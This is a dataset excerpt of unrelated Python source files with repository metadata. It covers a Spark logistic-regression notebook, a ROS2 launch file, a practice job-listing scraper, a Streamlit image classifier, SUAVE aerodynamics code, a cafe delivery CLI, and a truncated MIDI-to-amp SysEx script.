----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\ntrainPipe = Pipeline(stages=[label_indexer,feature_indexer, encoder, assembler]).fit(stroke_df)\ntrain = trainPipe.transform(stroke_df)\n\ntrain.persist()\ntrain.select(['features', 'stroke']).show(10, truncate=False)\n\n\n# COMMAND ----------\n\n# MAGIC %md ## Problem 3: Hyperparameter Tuningfor Logistic Regression\n\n# COMMAND ----------\n\n#Source:https://maryville.instructure.com/courses/56731/files/10976119?wrap=1&fd_cookie_set=1\naccuracy_eval = MulticlassClassificationEvaluator(\n predictionCol='prediction', labelCol='label', metricName='accuracy')\n\nlogreg = LogisticRegression(featuresCol='features', labelCol='label')\n\nparam_grid = (ParamGridBuilder()\n .addGrid(logreg.regParam, [ 0.0001, 0.001, 0.01, 0.1, 1])\n .addGrid(logreg.elasticNetParam, [0, 0.5,1])\n ).build()\ncv = CrossValidator(estimator=logreg, estimatorParamMaps=param_grid, evaluator=accuracy_eval, \n numFolds=5, seed=1, parallelism=8)\n\ncv_model = cv.fit(train)\n\n# COMMAND ----------\n\n#Source: https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nmodel = cv_model.bestModel\nopt_regParam = model.getRegParam()\nopt_enetParam = model.getElasticNetParam()\n\nprint('Max CV Score: ', round(max(cv_model.avgMetrics),4))\nprint('Optimal Lambda:', opt_regParam)\nprint('Optimal Alpha: ', opt_enetParam)\n\n# COMMAND ----------\n\nmodel_params = cv_model.getEstimatorParamMaps()\n\nlr_cv_summary_list = []\nfor param_set, acc in zip(model_params, cv_model.avgMetrics):\n new_set = list(param_set.values()) + [acc]\n lr_cv_summary_list.append(new_set)\nlr_cv_summary = pd.DataFrame( lr_cv_summary_list, columns=['reg_param', 'enet_param', 'acc'])\nfor en in lr_cv_summary.enet_param.unique():\n sel = lr_cv_summary.enet_param == en\n plt.plot( lr_cv_summary.reg_param[sel], lr_cv_summary.acc[sel], label=en)\n plt.scatter( lr_cv_summary.reg_param[sel], lr_cv_summary.acc[sel]) \nplt.legend()\nplt.xscale('log')\nplt.grid()\nplt.xlabel('Regularization Parameter')\nplt.ylabel('Cross-Validation Score')\nplt.show()\n \n\n# COMMAND ----------\n\n# MAGIC %md ## Problem 4: Training Predictions\n\n# COMMAND ----------\n\ntrain_pred = model.transform(train)\ntrain_pred.select('probability', 'prediction', 'label').show(10, truncate=False)\n\n# COMMAND ----------\n\ntrain_pred.select('probability', 'prediction', 'label').filter(expr('prediction <> stroke')).show(10, truncate=False)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC * The highest probability observed for an incorrect answer is 0.7327\n# MAGIC * The lowest probability observed for an incorrect answer is 0.3182 \n\n# COMMAND ----------\n\n# MAGIC %md ## Problem 5: Classification Metrics\n\n# COMMAND ----------\n\npred_and_labels = train_pred.rdd.map(lambda x:(x['prediction'],float(x['stroke'])))\n\n# COMMAND ----------\n\n#Source: https://maryville.instructure.com/courses/56731/files/10976095?wrap=1&fd_cookie_set=1\nmetrics = MulticlassMetrics(pred_and_labels)\nprint(metrics.accuracy)\n\n# COMMAND ----------\n\n#Source: https://maryville.instructure.com/courses/56731/files/10976095?wrap=1&fd_cookie_set=1\ncm = metrics.confusionMatrix().toArray().astype(int)\nlabels = trainPipe.stages[0].labels\n\n# COMMAND ----------\n\npd.DataFrame(\n data=cm, \n columns=labels,\n index=labels\n)\n \n\n# COMMAND ----------\n\n#source: https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nprint('cut Precision Recall')\nprint('------------------------------')\nfor i, lab in enumerate(labels):\n print(f'{lab:<12}{metrics.precision(i):<12.4f}{metrics.recall(i):.4f}')\n\n# COMMAND ----------\n\n# MAGIC %md ## Problem 6: Applying the Model to New Data\n\n# COMMAND ----------\n\n\nnewData = [\n ['Female', 42.0 ,1 ,0 , 'No' ,'Private' ,'Urban' ,182.1 ,26.8 ,'smokes'],\n ['Female', 64.0 ,0 ,1 , 'Yes' ,'Self-employed','Urban' ,171.5 ,32.5 ,'formerly smoked'],\n ['Female', 37.0 ,0 ,0 , 'Yes' ,'Private' ,'Urban' ,79.2 ,18.4 ,'Unkown'],\n ['Female', 72.0 ,0 ,1 , 'No' ,'Private' ,'Govt_job',125.7 ,19.4 ,'never smoked'] \n]\nnewData_schema = (\n 'gender STRING, age DOUBLE, hypertension INTEGER, heart_disease INTEGER, '\n 'ever_married STRING, work_type STRING, residence_type STRING, avg_glucose_level DOUBLE, ' \n 'bmi DOUBLE, smoking_status STRING')\n\n\nnewData = spark.createDataFrame(data= newData, schema =newData_schema )\nnewData.show()\n\n\n\n# COMMAND ----------\n\nnewDataTrans = trainPipe.transform(newData)\nnewPred = model.transform(newDataTrans)\nnewPred.select('probability', 'prediction').show(truncate=False)\n\n# COMMAND ----------\n\n\n","repo_name":"ShahidAbdulaziz/Spark","sub_path":"LogisitcRegression.py","file_name":"LogisitcRegression.py","file_ext":"py","file_size_in_byte":7861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11836924262","text":"#!/usr/bin/env python3\n\n# Author: Bishop Pearson\n\nimport os\n\nfrom ament_index_python.packages import get_package_share_directory\nfrom launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument\nfrom launch.actions import IncludeLaunchDescription\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import LaunchConfiguration\nfrom launch.substitutions import ThisLaunchFileDir\n\n\ndef generate_launch_description():\n omo_r1mini_mcu_parameter = LaunchConfiguration(\n 'omo_r1mini_mcu_parameter',\n default=os.path.join(\n get_package_share_directory('omo_r1mini_bringup'),\n 'param/omo_r1mini_mcu.yaml'\n )\n )\n\n omo_r1mini_lidar_parameter = LaunchConfiguration(\n 'omo_r1mini_lidar_parameter',\n default=os.path.join(\n get_package_share_directory('omo_r1mini_bringup'),\n 'param/omo_r1mini_lidar.yaml'\n )\n )\n\n use_sim_time = LaunchConfiguration('use_sim_time', default='false')\n\n omo_r1mini_description_dir = LaunchConfiguration(\n 'omo_r1mini_description_dir',\n default=os.path.join(\n get_package_share_directory('omo_r1mini_description'),\n 'launch'\n )\n )\n\n return LaunchDescription([\n DeclareLaunchArgument(\n 'omo_r1mini_mcu_parameter',\n default_value=omo_r1mini_mcu_parameter\n ),\n\n DeclareLaunchArgument(\n 'omo_r1mini_lidar_parameter',\n default_value=omo_r1mini_lidar_parameter\n ),\n\n IncludeLaunchDescription(\n PythonLaunchDescriptionSource([ThisLaunchFileDir(), '/omo_r1mini_mcu.launch.py']),\n launch_arguments={'omo_r1mini_mcu_parameter': omo_r1mini_mcu_parameter}.items()\n ),\n \n IncludeLaunchDescription(\n PythonLaunchDescriptionSource([ThisLaunchFileDir(), '/omo_r1mini_lidar.launch.py']),\n launch_arguments={'omo_r1mini_lidar_parameter': omo_r1mini_lidar_parameter}.items()\n ),\n \n IncludeLaunchDescription(\n PythonLaunchDescriptionSource([omo_r1mini_description_dir, '/omo_r1mini_state_publisher.launch.py']),\n launch_arguments={'use_sim_time': use_sim_time}.items(),\n ),\n ])\n","repo_name":"omorobot/omo_r1mini-foxy","sub_path":"omo_r1mini_bringup/launch/omo_r1mini_bringup.launch.py","file_name":"omo_r1mini_bringup.launch.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"20723992935","text":"#Jorge Angel Valdez Tristan 1957496\n#Importar modulos\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\n#obtener informacion del url\nurl = \"https://realpython.github.io/fake-jobs/\"\npage = requests.get(url)\n\n#Analizar html con bs\nsoup = bs(page.content, \"html.parser\")\nresults = soup.find(id=\"ResultsContainer\")\n\n#Buscar elemtos class = card-content\njob_elements = results.find_all(\"div\", class_=\"card-content\")\n#buscar elementos que contengan la palabra python\npython_jobs = results.find_all(\n \"h2\", string=lambda text:\"python\" in text.lower()\n )\n#buscar elemento de python_elemets y almacenarlos en vriable\n\npython_jobs_elements= [h2_element.parent.parent.parent for h2_element in python_jobs]\n#buscar y mostrar inf de los trabajos relac a python\nfor job_element in python_jobs_elements:\n title_element = job_element.find(\"h2\", class_=\"title\")\n company_element = job_element.find (\"h3\", class_=\"company\")\n location_element = job_element.find (\"p\", class_=\"location\")\n #buscar etiquetas a\n link_url= job_element.find_all(\"a\")[1][\"href\"]\n print (title_element.text.strip())\n print (company_element.text.strip())\n print(location_element.text.strip())\n #fornatear print para incluir salida del link\n print (f\"apply here: {link_url}\\n\")\n print()\n \n\n\n \n\n\n","repo_name":"Angeltrst03/Laboratorio-programacion-para-ciberseguridad","sub_path":"5 Websrcaping/scrap12.py","file_name":"scrap12.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5499289708","text":"from fastai.learner import load_learner\nfrom fastai.vision.core import PILImage\n\nimport streamlit as st\nfrom PIL import Image\n\ndef load_image(image):\n '''\n Pass BytesIO image\n Return PILImage object\n '''\n return Image.open(image)\n\ndef predict_img(img):\n '''\n Pass PILImage object\n Return prediction[str], prediction_idx[int], probability[tensor]\n '''\n if img is not None:\n return learner_inf.predict(pil_img)\n\n'## Big Cats Classifier'\n\"Here's the [GitHub](https://github.com/dnaveenr/big_cat_classifier) repo\"\n'Upload a picture of a Big Cat and determine which category it belongs to.'\n\nlearner_inf = load_learner(\"./big_cat_classifier.pkl\")\n\n# Upload\npic = st.file_uploader(\"Upload Image File\")\n\n\nprobs = []\npred_idx = 1\npred = 'n/a'\n\n# Display image\nif pic is not None:\n img = load_image(pic)\n st.image(img, use_column_width=True)\n\n # Parse image\n pil_img = PILImage.create(pic)\n\n # Predict category\n pred, pred_idx, probs = predict_img(pil_img)\n\n'Click Classify'\n\n# Classify\nif st.button('Classify'):\n 'Predicted as ', pred\n 'Probability of ', str(round(probs[pred_idx].item(), 3) * 100), '%'\n\n\"Note : Probability greater than 90% indicates a confident guess whereas a lower probability indicates the model is not very sure of the guess. :)\"","repo_name":"dnaveenr/big_cat_classifier","sub_path":"src/streamlit_deploy.py","file_name":"streamlit_deploy.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38835918883","text":"## @ingroup Analyses-Aerodynamics\n# Lifting_Line.py\n# \n# Created: Aug 2017, E. Botero\n# Apr 2020, M. Clarke\n# Jun 2021, R. Erhard\n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\n\nimport numpy as np\nfrom SUAVE.Core import Data, Units\nfrom SUAVE.Methods.Aerodynamics.Lifting_Line import lifting_line as LL\nfrom .Aerodynamics import Aerodynamics\n\n# ----------------------------------------------------------------------\n# Class\n# ----------------------------------------------------------------------\n## @ingroup Analyses-Aerodynamics\nclass Lifting_Line(Aerodynamics):\n \"\"\"This builds a surrogate and computes lift using a basic lifting line.\n\n Assumptions:\n None\n\n Source:\n None\n \"\"\" \n\n def __defaults__(self):\n \"\"\"This sets the default values and methods for the analysis.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n None\n\n Outputs:\n None\n\n Properties Used:\n N/A\n \"\"\" \n self.tag = 'Lifting_Line'\n\n self.geometry = Data()\n self.settings = Data()\n\n # correction factors\n self.settings.fuselage_lift_correction = 1.14\n self.settings.trim_drag_correction_factor = 1.02\n self.settings.wing_parasite_drag_form_factor = 1.1\n self.settings.fuselage_parasite_drag_form_factor = 2.3\n\n # vortex lattice configurations\n self.settings.number_of_stations = 100\n \n # conditions table, used for surrogate model training\n self.training = Data() \n self.training.angle_of_attack = np.array([-10.,-5.,0.,5.,10.]) * Units.deg\n self.training.lift_coefficient = None\n self.training.drag_coefficient = None\n \n # surrogoate models\n self.surrogates = Data()\n self.surrogates.lift_coefficient = None\n self.surrogates.drag_coefficient = None\n \n \n def initialize(self,use_surrogate,n_sw,n_cw ,propeller_wake_model,mf,mn ,dcs):\n \"\"\"Drives functions to get training samples and build a surrogate.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n None\n\n Outputs:\n None\n\n Properties Used:\n None\n \"\"\" \n settings = self.settings\n \n if n_sw is not None:\n settings.number_of_stations = n_sw\n \n # sample training data\n self.sample_training()\n \n # build surrogate\n self.build_surrogate()\n\n\n def evaluate(self,state,settings,geometry):\n \"\"\"Evaluates lift and drag using available surrogates.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n state.conditions.\n freestream.dynamics_pressure [-]\n angle_of_attack [radians]\n\n Outputs:\n conditions.aerodynamics.lift_breakdown.\n inviscid_wings[wings.*.tag] [-] CL (wing specific)\n inviscid_wings.total [-] CL\n conditions.aerodynamics.drag_breakdown.induced\n inviscid_wings[wings.*.tag] [-] CDi (wing specific)\n total [-] CDi\n inviscid [-] CDi\n\n conditions.aerodynamics.\n inviscid_wings_lift [-] CL\n\n Properties Used:\n self.surrogates.\n lift_coefficient [-] CL\n wing_lift_coefficient[wings.*.tag] [-] CL (wing specific)\n drag_coefficient [-] CDi\n wing_drag_coefficient[wings.*.tag] [-] CDi (wing specific)\n \"\"\" \n # unpack\n\n surrogates = self.surrogates \n conditions = state.conditions\n \n # unpack \n q = conditions.freestream.dynamic_pressure\n AoA = conditions.aerodynamics.angle_of_attack\n Sref = geometry.reference_area\n \n wings_lift_model = surrogates.lift_coefficient\n wings_drag_model = surrogates.drag_coefficient\n \n # inviscid lift of wings only\n inviscid_wings_lift = Data()\n inviscid_wings_drag = Data()\n inviscid_wings_lift.total = wings_lift_model(AoA)\n inviscid_wings_drag.total = wings_drag_model(AoA) \n conditions.aerodynamics.lift_breakdown.inviscid_wings = Data()\n conditions.aerodynamics.lift_breakdown.compressible_wings = Data()\n conditions.aerodynamics.drag_breakdown.induced = Data()\n conditions.aerodynamics.drag_breakdown.induced.inviscid_wings = Data()\n conditions.aerodynamics.lift_breakdown.inviscid_wings.total = inviscid_wings_lift.total\n conditions.aerodynamics.lift_coefficient = inviscid_wings_lift.total\n conditions.aerodynamics.drag_breakdown.induced.total = inviscid_wings_drag.total\n conditions.aerodynamics.drag_breakdown.induced.inviscid = inviscid_wings_drag.total\n conditions.aerodynamics.drag_coefficient = inviscid_wings_drag.total \n \n # store model for lift coefficients of each wing \n for wing in geometry.wings.keys():\n wings_lift_model = surrogates.wing_lift_coefficients[wing] \n wings_drag_model = surrogates.wing_drag_coefficients[wing]\n inviscid_wings_lift[wing] = wings_lift_model(AoA)\n inviscid_wings_drag[wing] = wings_drag_model(AoA)\n conditions.aerodynamics.lift_breakdown.inviscid_wings[wing] = inviscid_wings_lift[wing] \n conditions.aerodynamics.lift_breakdown.compressible_wings[wing] = inviscid_wings_lift[wing]\n conditions.aerodynamics.drag_breakdown.induced.inviscid_wings[wing] = inviscid_wings_drag[wing] \n\n return inviscid_wings_lift , inviscid_wings_drag\n\n\n def sample_training(self):\n \"\"\"Call methods to run vortex lattice for sample point evaluation.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n see properties used\n\n Outputs:\n self.training.\n lift_coefficient [-] \n wing_lift_coefficients [-] (wing specific)\n\n Properties Used:\n self.geometry.wings.*.tag\n self.settings (passed to calculate vortex lattice)\n self.training.angle_of_attack [radians]\n \"\"\" \n # unpack\n geometry = self.geometry\n settings = self.settings\n training = self.training\n \n AoA = training.angle_of_attack\n CL = np.zeros_like(AoA)\n CDi = np.zeros_like(AoA)\n \n wing_CLs = Data.fromkeys(geometry.wings.keys(), np.zeros_like(AoA))\n wing_CDis = Data.fromkeys(geometry.wings.keys(), np.zeros_like(AoA)) \n\n # condition input, local, do not keep\n konditions = Data()\n konditions.aerodynamics = Data()\n\n # calculate aerodynamics for table\n for i,_ in enumerate(AoA):\n \n # overriding conditions, thus the name mangling\n konditions.aerodynamics.angle_of_attack = AoA[i]\n \n # these functions are inherited from Aerodynamics() or overridden\n CL[i], wing_lifts , CDi[i], wing_drags = calculate_lift_lifting_line(konditions, settings, geometry)\n for wing in geometry.wings.values():\n wing_CLs[wing.tag][i] = wing_lifts[wing.tag]\n wing_CDis[wing.tag][i] = wing_drags[wing.tag]\n\n # store training data\n training.lift_coefficient = CL\n training.wing_lift_coefficients = wing_CLs\n training.drag_coefficient = CDi\n training.wing_drag_coefficients = wing_CDis \n\n return\n\n def build_surrogate(self):\n \"\"\"Build a surrogate using sample evaluation results.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n see properties used\n\n Outputs:\n self.surrogates.\n lift_coefficient \n wing_lift_coefficients (multiple surrogates)\n\n Properties Used:\n self.\n training.\n angle_of_attack [radians]\n lift_coefficient [-]\n wing_lift_coefficients [-] (wing specific)\n drag_coefficient [-]\n wing_drag_coefficients [-] (wing specific)\n \"\"\" \n # unpack data\n training = self.training\n AoA_data = training.angle_of_attack\n CL_data = training.lift_coefficient\n wing_CL_data = training.wing_lift_coefficients\n CDi_data = training.drag_coefficient\n wing_CDi_data = training.wing_drag_coefficients \n\n # pack for surrogate model\n X_data = np.array([AoA_data]).T\n X_data = np.reshape(X_data,-1)\n \n # learn the model\n cl_surrogate = np.poly1d(np.polyfit(X_data, CL_data ,1))\n cdi_surrogate = np.poly1d(np.polyfit(X_data, CDi_data ,2))\n \n wing_cl_surrogates = Data()\n wing_cdi_surrogates = Data()\n \n for wing in wing_CL_data.keys():\n wing_cl_surrogates[wing] = np.poly1d(np.polyfit(X_data, wing_CL_data[wing] ,1))\n wing_cdi_surrogates[wing] = np.poly1d(np.polyfit(X_data, wing_CL_data[wing] ,2))\n\n self.surrogates.lift_coefficient = cl_surrogate\n self.surrogates.drag_coefficient = cdi_surrogate\n self.surrogates.wing_lift_coefficients = wing_cl_surrogates\n self.surrogates.wing_drag_coefficients = wing_cdi_surrogates\n\n return\n\n\n\n# ----------------------------------------------------------------------\n# Helper Functions\n# ----------------------------------------------------------------------\n\n\ndef calculate_lift_lifting_line(conditions,settings,geometry):\n \"\"\"Calculate the total vehicle lift coefficient and specific wing coefficients (with specific wing reference areas)\n using a vortex lattice method.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n conditions (passed to vortex lattice method)\n settings (passed to vortex lattice method)\n geometry.reference_area [m^2]\n geometry.wings.*.reference_area (each wing is also passed to the vortex lattice method)\n\n Outputs:\n \n\n Properties Used:\n \n \"\"\" \n\n # unpack\n vehicle_reference_area = geometry.reference_area\n\n # iterate over wings\n total_lift_coeff = 0.0\n total_drag_coeff = 0.0\n wing_lifts = Data()\n wing_drags = Data()\n for wing in geometry.wings.values():\n\n [wing_lift_coeff,wing_drag_coeff] = LL(conditions,settings,wing)\n total_lift_coeff += wing_lift_coeff * wing.areas.reference / vehicle_reference_area\n total_drag_coeff += wing_drag_coeff * wing.areas.reference / vehicle_reference_area\n wing_lifts[wing.tag] = wing_lift_coeff\n wing_drags[wing.tag] = wing_drag_coeff\n\n return total_lift_coeff, wing_lifts , total_drag_coeff , wing_drags\n","repo_name":"suavecode/SUAVE","sub_path":"trunk/SUAVE/Analyses/Aerodynamics/Lifting_Line.py","file_name":"Lifting_Line.py","file_ext":"py","file_size_in_byte":11713,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"61"} +{"seq_id":"73128716035","text":"import model\n\n\ndef navigate_main_menu():\n while True:\n print_main_menu_options()\n try:\n cmd = int(input(\"Enter input here -> \"))\n if cmd == 0:\n model.save_products_to_csv()\n model.save_couriers_to_csv()\n model.save_orders_to_csv()\n exit()\n elif cmd == 1:\n navigate_product_menu()\n elif cmd == 2:\n navigate_courier_menu()\n elif cmd == 3:\n navigate_order_menu()\n else:\n print(\"Error: Please input valid number.\")\n continue\n except ValueError:\n print(\"Please enter a number.\")\n break\n\n\ndef print_main_menu_options():\n print(\n (\n \"\"\"\nWelcome to Hamda's cafe app:\nMAIN MENU\nExit: 0\nProduct Menu: 1\nCourier Menu: 2\nOrder Menu: 3\n\"\"\"\n )\n )\n\n\ndef navigate_product_menu():\n while True:\n print_product_menu_options()\n try:\n cmd = int(input(\"Enter input here -> \")) \n if cmd == 0:\n navigate_main_menu()\n elif cmd == 1:\n model.print_products(model.product_list)\n continue\n elif cmd == 2:\n product_name = input(\"Enter new product name -> \")\n product_price = float(input(\"Enter new product price -> \"))\n model.add_product(model.product_list, product_name, product_price)\n continue\n elif cmd == 3:\n model.update_product(model.product_list)\n continue\n elif cmd == 4:\n model.delete_product(model.product_list)\n continue\n else:\n print(\"Error: please input valid number.\")\n continue\n except ValueError:\n print(\"Error: please enter a number\")\n continue\n\ndef print_product_menu_options():\n print(\n \"\"\"\nPRODUCT MENU\nExit to MAIN MENU: 0\nPrint products: 1\nAdd product: 2\nUpdate product: 3\nDelete product: 4\n\"\"\"\n )\n\n\ndef navigate_courier_menu():\n\n while True:\n print_courier_menu_options()\n try:\n cmd = int(input(\"Enter input here -> \"))\n if cmd == 0:\n # include save property\n navigate_main_menu()\n elif cmd == 1:\n model.print_couriers(model.courier_list)\n elif cmd == 2:\n courier_name = input(\"Please enter courier name -> \")\n courier_phone = input(\"Please enter courier phone number -> \")\n model.add_courier(model.courier_list, courier_name, courier_phone)\n elif cmd == 3:\n model.update_courier(model.courier_list)\n elif cmd == 4:\n model.delete_courier(model.courier_list)\n continue\n else:\n print(\"Error: please input valid number.\")\n continue\n except ValueError:\n print(\"Error: please enter a number\")\n continue\n\ndef print_courier_menu_options():\n print(\n \"\"\"\nCOURIER MENU\nExit to MAIN MENU: 0\nPrint couriers: 1\nAdd courier: 2\nUpdate courier: 3\nDelete courier: 4\n\"\"\"\n )\n\n\ndef navigate_order_menu():\n while True:\n print_order_menu_options()\n try:\n cmd = int(input(\"Enter input here -> \"))\n if cmd == 0:\n navigate_main_menu()\n elif cmd == 1:\n model.print_orders(model.order_list)\n continue\n elif cmd == 2:\n customer_name = input(\"Please enter customer name -> \")\n customer_address = input(\"Please enter customer phone addresss -> \")\n customer_phone_number = input(\"Please enter customer phone number ->\")\n model.add_order(\n model.order_list,\n customer_name,\n customer_address,\n customer_phone_number\n )\n continue\n elif cmd == 3:\n model.update_order(model.order_list)\n continue\n elif cmd == 4:\n model.delete_order(model.order_list)\n continue\n else:\n print(\"Error: please input valid number.\")\n continue\n except ValueError:\n print(\"Error: please enter a number\")\n continue\n\n\ndef print_order_menu_options():\n print(\n \"\"\"\n ORDER MENU\n Exit to MAIN MENU: 0\n Print orders: 1\n Add order: 2\n Update order: 3\n Delete order: 3\n \"\"\"\n )\n\n\nif __name__ == \"__main__\":\n model.load_products()\n model.load_couriers()\n model.load_orders()\n\n navigate_main_menu()\n","repo_name":"hamdamuse/delivery_app_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31422504912","text":"\"\"\"\nMididings script translating from a couple of Actition MIDI controller\nfootpedals to control of a Katana MkII Head amplifier.\n\nMIDI out from the controllers should be routed into mididings input, and\nmididings output routed to the Katana.\n\"\"\"\nimport time\n\nfrom _thread import start_new_thread\n\nfrom mididings import *\nfrom mididings import engine\nfrom mididings import event\n\nconfig(\n backend='alsa',\n client_name='katana_proxy',\n data_offset=0,\n )\n\naddresses = {\n # effect colors\n \"60 00 06 39\": \"boost_color\",\n \"60 00 06 3a\": \"mod_color\",\n \"60 00 06 3b\": \"fx_color\",\n \"60 00 06 3c\": \"delay_color\",\n \"60 00 06 3d\": \"reverb_color\",\n \"00 00 00 2e\": \"global_eq_color\",\n\n # patch\n \"00 01 00 00\": \"patch_selected\",\n\n # effect / property toggles\n \"60 00 05 40\": \"reverb_on\",\n \"60 00 05 20\": \"delay2_on\",\n \"60 00 05 50\": \"pedal_fx_on\",\n \"60 00 06 14\": \"solo_on\",\n }\n\nPREFIX = \"f0 41 00 00 00 00 33\"\n\nsysex_cmds = {\n \"boost_color\": {\n 0: PREFIX + \" 12 60 00 06 39 00 61 f7\",\n 1: PREFIX + \" 12 60 00 06 39 01 60 f7\",\n 2: PREFIX + \" 12 60 00 06 39 02 5f f7\",\n },\n \"mod_color\": {\n 0: PREFIX + \" 12 60 00 06 3a 00 60 f7\",\n 1: PREFIX + \" 12 60 00 06 3a 01 5f f7\",\n 2: PREFIX + \" 12 60 00 06 3a 02 5e f7\",\n },\n \"fx_color\": {\n 0: PREFIX + \" 12 60 00 06 3b 00 5f f7\",\n 1: PREFIX + \" 12 60 00 06 3b 01 5e f7\",\n 2: PREFIX + \" 12 60 00 06 3b 02 5d f7\",\n },\n \"delay1_color\": {\n 0: PREFIX + \" 12 60 00 06 3c 00 5e f7\",\n 1: PREFIX + \" 12 60 00 06 3c 01 5d f7\",\n 2: PREFIX + \" 12 60 00 06 3c 02 5c f7\",\n },\n \"reverb_color\": {\n 0: PREFIX + \" 12 60 00 06 3d 00 5d f7\",\n 1: PREFIX + \" 12 60 00 06 3d 01 5c f7\",\n 2: PREFIX + \" 12 60 00 06 3d 02 5b f7\",\n },\n \"global_eq_color\": {\n 0: PREFIX + \" 12 00 00 00 2e 00 52 f7\",\n 1: PREFIX + \" 12 00 00 00 2e 01 51 f7\",\n 2: PREFIX + \" 12 00 00 00 2e 02 50 f7\",\n },\n\n # 127 -> on, 0 -> off\n \"reverb_on\": {\n 1: PREFIX + \" 12 60 00 05 40 01 5a f7\",\n 0: PREFIX + \" 12 60 00 05 40 00 5b f7\",\n },\n \"delay2_on\": {\n 1: PREFIX + \" 12 60 00 05 20 01 7a f7\",\n 0: PREFIX + \" 12 60 00 05 20 00 7b f7\",\n },\n \"pedal_fx_on\": {\n 1: PREFIX + \" 12 60 00 05 50 01 4a f7\",\n 0: PREFIX + \" 12 60 00 05 50 00 4b f7\",\n },\n \"preamp_solo_on\": {\n 1: PREFIX + \" 12 60 00 06 14 01 05 f7\",\n 0: PREFIX + \" 12 60 00 06 14 00 06 f7\",\n },\n \"select_amp\": PREFIX + \" 12 00 01 00 00 00 {} {} f7\",\n \"delay1_tap\": PREFIX + \" 12 60 00 05 02 {} {} {} f7\",\n \"delay2_tap\": PREFIX + \" 12 60 00 05 22 {} {} {} f7\",\n }\n\namp_state = {\n # effect colors: 0 == green, 1 == red, 2 == yellow\n \"boost_color\": 0,\n \"mod_color\": 0,\n \"fx_color\": 0,\n \"delay_color\": 0,\n \"reverb_color\": 0,\n \"global_eq_color\": 0,\n\n # setting toggles: 0 == off, 1 == on\n \"reverb_on\": 0,\n \"delay2_on\": 0,\n \"pedal_fx_on\": 0,\n \"preamp_solo_on\": 0,\n\n \"bank\": 0, # toggles btn 0 and 127\n \"patch_selected\": 1, # from 1-8\n\n \"delay1_tap\": 0, # becomes a timestamp (ms since epoch)\n \"delay2_tap\": 0,\n }\n\ndef next_color(ev, attr_name):\n \"\"\"\n Switches the specified effect to the next color in the cycle.\n \"\"\"\n # determine the next color and set for next time\n color = amp_state[attr_name]\n if color >= 2:\n color = 0\n else:\n color = color + 1\n amp_state[attr_name] = color\n\n # send the command\n sysex_cmd = sysex_cmds[attr_name][color]\n return event.SysExEvent(ev.port, sysex_cmd)\n\ndef toggle_effect(ev, effect):\n \"\"\"\n Toggles the specified trait on (value 127) or off (value 0).\n \"\"\"\n key = ev.value\n # 0-63 == off, 64-127 == on\n if key <= 63:\n key = 0\n else:\n key = 1\n sysex_cmd = sysex_cmds[effect][key]\n return event.SysExEvent(ev.port, sysex_cmd)\n\ndef select_amp_sysex(patch):\n \"\"\"\n Returns the sysex cmd for selecting the specified patch.\n \"\"\"\n checksum = get_checksum(\n (0, 1, 0, 0, 0, patch))\n return sysex_cmds[\"select_amp\"].format(\n '{:02x}'.format(patch), '{:02x}'.format(checksum)\n )\n\ndef select_amp(ev):\n \"\"\"\n We accept program change (PC) values 1-4. If the `bank` value is 0 we use\n the first bank, if >0 we use the second one.\n \"\"\"\n patch = ev.program\n if not 1 <= patch <= 4:\n # expect PC 1-4\n return\n if amp_state[\"bank\"] > 0:\n # upper bank is 5-8\n patch = patch + 4\n amp_state[\"patch_selected\"] = patch\n sysex_cmd = select_amp_sysex(patch)\n return event.SysExEvent(ev.port, sysex_cmd)\n return ev\n\ndef toggle_amp_bank(ev):\n \"\"\"\n Toggles btn the two banks of four amps.\n \"\"\"\n if ev.value == amp_state[\"bank\"]:\n # we're already in the selected bank, do nothing\n return\n\n # get current patch and adjust it to match the new bank\n patch = amp_state[\"patch_selected\"]\n if ev.value == 0:\n patch = patch - 4\n else:\n patch = patch + 4\n\n # update our state trackng w the new values\n amp_state[\"bank\"] = ev.value\n amp_state[\"patch_selected\"] = patch\n\n # emit sysex event to switch to the corresponding amp in the other bank\n return event.SysExEvent(ev.port, select_amp_sysex(patch))\n\ndef delay_tap(ev, tap_str):\n \"\"\"\n Set delay interval by tapping. `tap_str` should be the sysex key,\n `delay1_tap` or `delay2_tap`.\n \"\"\"\n # now in whole milliseconds\n now = int(time.time() * 1000)\n\n # always store the new tap time\n last_tap = amp_state[tap_str]\n amp_state[tap_str] = now\n interval = now - last_tap\n\n # if first tap or > 2s since last tap, do nothing else\n if interval > 2000:\n return\n\n # get 11 digit binary representation\n interval_bin = bin(interval)[2:].zfill(11)\n\n # first four digits are the first hex number\n first_hex = int(interval_bin[:4], 2)\n # last 7 digits w a prepended zero is the second hex number\n second_hex = int('0'+interval_bin[4:], 2)\n\n if tap_str == \"delay1_tap\":\n code = 2 # delay1's opcode is 0x02\n else:\n code = 34 # delay2's opcode is 0x22\n\n checksum = get_checksum((96, 0, 5, code, first_hex, second_hex))\n\n # turn them into 2 digit strings\n first_hex = '0' + 